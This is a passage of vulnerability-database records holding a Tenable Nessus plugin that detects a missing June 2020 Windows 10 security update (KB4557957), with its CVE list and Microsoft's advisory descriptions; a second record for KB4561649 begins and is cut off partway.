"CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4557957.NASL", "href": "https://www.tenable.com/plugins/nessus/137304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137304);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1120\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1284\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4557957\");\n script_xref(name:\"MSFT\", value:\"MS20-4557957\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4557957: Windows 10 Version 2004 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4557957/windows-10-update-kb4557957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4706967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4557957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4557957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"06_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4557957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:16", "description": "The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n 